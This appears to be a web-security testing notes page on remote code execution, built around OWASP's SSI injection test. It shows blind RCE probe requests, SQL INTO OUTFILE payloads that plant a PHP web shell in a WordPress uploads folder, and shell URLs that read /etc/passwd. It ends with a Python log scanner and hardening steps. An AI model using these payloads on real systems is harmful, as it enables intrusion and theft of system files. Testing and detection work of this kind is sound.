
RCE attack - Remote Code Execution

OWASP
[OWASP Web Security Testing Guide 4.2](../OWASP/index.md) > 7. Data Validation Testing > 7.8. Testing for SSI Injection
| ID | Link to Hackinglife | Link to OWASP | Description |
|---|---|---|---|
| 7.8 | WSTG-INPV-08 | Testing for SSI Injection | - Identify SSI injection points (presence of the .shtml extension) with these characters: `< ! # = / . " - >` and `[a-zA-Z0-9]` - Assess the severity of the injection. |

In an RCE attack, the attacker exploits a code vulnerability to run arbitrary commands on a target system, for example by manipulating the traffic it receives, and uses that foothold to access the corporate network.

Exploiting a blind remote code execution vulnerability through a GET request, using Burp Suite (to send the requests) and Wireshark (to capture the traffic). Because the response shows no command output, execution is confirmed by a measurable delay or by the network traffic the injected command generates.

```http
GET /script.php?c=sleep+5&ok=ok HTTP/1.1
Host: 192.168.137.130
User-Agent: ...
...
```

Another command, whose ICMP traffic can then be seen in Wireshark:

```http
GET /script.php?c=ping+192.168.139.130+-c+5&ok=ok HTTP/1.1
```

Gaining a reverse shell from SQL injection

Take a WordPress installation that uses a MySQL database. If you manage to log in to the MySQL panel (/phpmyadmin) as root, you can write a PHP shell into the /wp-content/uploads/ folder with `SELECT ... INTO OUTFILE`.

```sql
SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE "/var/www/https/blogblog/wp-content/uploads/shell.php";
```

Commands can now be executed from the browser:

https://example.com/blogblog/wp-content/uploads/shell.php?cmd=cat+/etc/passwd

One more example:

```sql
-- The PHP string is single-quoted so the double quotes inside it do not end the
-- SQL literal; FROM mysql.user LIMIT 1 just supplies one row to write.
SELECT '<?php $output = shell_exec($_GET["cmd"]); echo "<pre>" . $output . "</pre>"; ?>' INTO OUTFILE '/var/www/https/shell.php' FROM mysql.user LIMIT 1;
```

The shell is then reachable from the browser:

https://example.com/shell.php?cmd=cat+/etc/passwd
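As an added defender-side example (not part of the original notes), the following Python scans Apache combined-format access log lines for the two patterns described above: blind RCE probes that pass `sleep N` or `ping ... -c N` through a query parameter, and PHP being executed from the WordPress uploads directory, which should only ever serve static files. The log lines are constructed for the example; only the request paths mirror those on this page.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed Apache combined-format log lines (not real traffic) that mirror the
# requests shown on this page, plus two benign ones for contrast.
SAMPLE_LOG = """\
192.168.137.1 - - [18/Jan/2023:23:30:01 +0000] "GET /script.php?c=sleep+5&ok=ok HTTP/1.1" 200 12 "-" "Mozilla/5.0"
192.168.137.1 - - [18/Jan/2023:23:30:09 +0000] "GET /script.php?c=ping+192.168.139.130+-c+5&ok=ok HTTP/1.1" 200 12 "-" "Mozilla/5.0"
192.168.137.1 - - [18/Jan/2023:23:31:40 +0000] "GET /blogblog/wp-content/uploads/shell.php?cmd=cat+/etc/passwd HTTP/1.1" 200 1523 "-" "curl/8.0"
192.168.137.2 - - [18/Jan/2023:23:32:00 +0000] "GET /blogblog/wp-content/uploads/2023/01/logo.png HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
192.168.137.3 - - [18/Jan/2023:23:32:05 +0000] "GET /script.php?c=report&ok=ok HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Blind-RCE probes from this page: a time delay or an out-of-band ping, possibly
# chained after another command with ; & | or a backtick.
BLIND_PROBE_RE = re.compile(r'(^|[;&|`\s])(sleep\s+\d+|ping\s+(\S+\s+)?-c\s+\d+)', re.I)
# PHP requested from the WordPress uploads tree, which should only serve static files.
UPLOADS_PHP_RE = re.compile(r'/wp-content/uploads/.*\.php\d?$', re.I)


def classify(line):
    """Return the findings for one access-log line; an empty list means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlparse(m.group("target"))
    findings = []
    if UPLOADS_PHP_RE.search(url.path):
        findings.append("php-in-uploads")
    # parse_qs decodes '+' and percent-encoding, so 'sleep+5' is inspected as 'sleep 5'
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        if any(BLIND_PROBE_RE.search(v) for v in values):
            findings.append(f"blind-rce-probe:{name}")
    return findings


def scan(log_text):
    """Map each suspicious request target to its findings, skipping benign lines."""
    report = {}
    for line in log_text.splitlines():
        findings = classify(line)
        if findings:
            report[LOG_RE.match(line).group("target")] = findings
    return report
```

Pair this detection with the corresponding hardening: deny PHP execution under wp-content/uploads at the web server, and on the database side revoke the FILE privilege from application accounts and restrict `secure_file_priv` so `INTO OUTFILE` cannot write into the web root.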
Last update: 2024-04-03
Created: January 18, 2023 23:33:16